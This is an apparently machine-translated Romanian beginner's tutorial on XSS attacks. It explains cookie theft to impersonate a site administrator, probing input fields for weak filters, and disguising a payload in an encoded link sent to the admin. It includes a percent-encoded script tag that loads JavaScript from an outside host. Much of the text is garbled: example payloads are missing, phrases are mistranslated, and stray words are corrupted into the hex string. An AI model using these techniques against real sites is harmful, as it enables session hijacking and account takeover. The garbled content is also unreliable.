Xss - pentru începători

### Cum se utilizează XSS.

Mai întâi trebuie să știm ce este un cookie.
Dacă știți, puteți săriți.

Cookie-urile sunt folosite pentru a stoca acreditările site-ului pe computerul vizitatorului.






Dacă v-ați înregistrat pe site sub porecla "blabluble", site-ul a salvat pe computer un fișier cu cookie-uri, unde datele dvs. sunt codate.
Și dacă aveți un administrator și aveți acces la site și eu sunt un utilizator care a furat cookie-urile de la tine (admin), atunci mă pot duce în siguranță la site și site-ul mă definește drept "admin" - voi avea drepturi de administrator.

Pentru a schimba (înlocuiți furate), vă sfătuiți să utilizați CookieEdit pentru IE sau funcții încorporate în Opera și Firefox.


# # # Ce este un atac XSS?

Atacurile XSS nu sunt atacuri pe site-ul în sine, ci pe utilizatorii site-ului.
XSS este un defect în filtru, aplicație.

Există XSS pasiv și XSS activ.

Ce este Passive XSS?

Active - acest XSS, care nu necesită nicio acțiune suplimentară din partea victimei - este suficient doar să deschideți pagina cu XSS, iar codul Java va fi executat automat.
Datorită automatizării lor, ele sunt foarte utile și valoroase.
De exemplu, active xss există în etichetele BB din cauza unei filtrare insuficiente, atunci când lăsați un mesaj pe forumul # 092; guest # 092; un chat care va fi întotdeauna activ la fiecare actualizare.


### Deci, mă duc în mod specific la modul de a găsi XSS în acest site.

De unde știți că XSS-ul de pe un anumit site trece?
Furiozitate oribilă de tip

Încercăm să inserăm acest script în toate domeniile diferite. dacă este afișat un mesaj, scriptul a fost procesat și executat.

Cele mai frecvente XSS-uri (observate în toate locurile unde filtrele necorespunzătoare):


Întregul punct este ">.
Să ne gândim la ceea ce facem când intrăm în câmp ">. ce se întâmplă?
Introducem în formă

o variabilă este atribuită o valoare pentru câmp. Variabila este procesată, "> execută, închide
script și descărcări

Acest XSS este cel mai popular în motoarele de căutare:
Scanăm toate câmpurile site-ului și încercăm să inserăm


Dacă primiți un mesaj, ați găsit XSS.


Și cum să determinăm dacă există un filtru sau nu?

Doar în orice câmp, introduceți: ""; "<########>=
Apoi, deschideți pagina html și căutați cuvântul "########"
și vedeți sivoli ulteriori ..

În cazul în care <> așa că rămâne că acesta este primul semn al vulnerabilității - înseamnă că filtrul are o gaură.
Dacă "# 092; caracterele sunt identice cu cele introduse - acesta este al doilea semn al vulnerabilității - posibile caractere suplimentare pentru atacul XSS ulterior.






Apoi, dacă ați deschis HTML, nu ați găsit <> apoi cel mai probabil o gaură în filtru.
Dacă deschideți HTML, veți găsi acest lucru <> înlocuit cu alte simboluri, atunci acesta este un bummer - un filtru la
funcționează în mod normal.
De asemenea, este posibil să introduceți următoarele în câmp pentru a verifica filtrarea: "><>'' `, / # 092 ;? @%

Luați în considerare cazul în care filtrul mănâncă <>

În acest caz, există o probabilitate de gaură.
De exemplu, un filtru are o condiție de a mânca

- 2) Puteți face acest lucru în continuare:


această metodă este mai sigură.


% 68% 74% 74% 70% 3A% 2F% 2F% 2A% 2A% 2A% 2A% 2A% 2E% 72% 75% 2F% luna iunie 6% 72% 65% 65% 3F% 70% 3D% 27% 3E% 3C% 73% 63% 72% 69% 70% 74% 20% 73% 72% 63% 3D% 68% 74% 74% 70% 3A% 2F% 2F% 68% 61% 6B% 6E% 65% 74% 2E% 68% 31% 36% 2E% 72% 75% 2F% 73% 63% 72% 69% 70% 74% 2F% 6A% Mar. 7% 2E% 6A% 73% 3E% 3C% 2F% 73 % 63% 72% 69% 70% 74% 3E

a fost codificat:

- 3) În special criptarea este necesară nu numai pentru a înșela filtrele, ci și pentru a înșela ADMIN atunci când utilizați PASSIVE CSU.

Ce îți ceri document.location.href? )). acesta este codul Java, care fără o cerere merge la site-ul specificat. Deci, o face, am dat link-ul la admin, și el a mers la site-ul nostru, asta este ceea ce se face. El aruncă repede


% 68% 74% 74% 70% 3A% 2F% 2F% 2A% 2A% 2A% 2A% 2A% 2E% 72% 75% 2F% luna iunie 6% 72% 65% 65% 3F% 70% 3D% 27% 3E% 3C% 73% 63% 72% 69% 70% 74% 20% 73% 72% 63% 3D% 68% 74% 74% 70% 3A% 2F% 2F% 68% 61% 6B% 6E% 65% 74% 2E% 68% 31% 36% 2E% 72% 75% 2F% 73% 63% 72% 69% 70% 74% 2F% 6A% Mar. 7% 2E% 6A% 73% 3E% 3C% 2F% 73 % 63% 72% 69% 70% 74% 3E


și acesta este deja Xss-ul nostru în formă criptată.

Notă: acest lucru va funcționa numai atunci când Xss va aparține administratorului site-ului la care ați abandonat linkul.







Articole similare

Trimiteți-le prietenilor: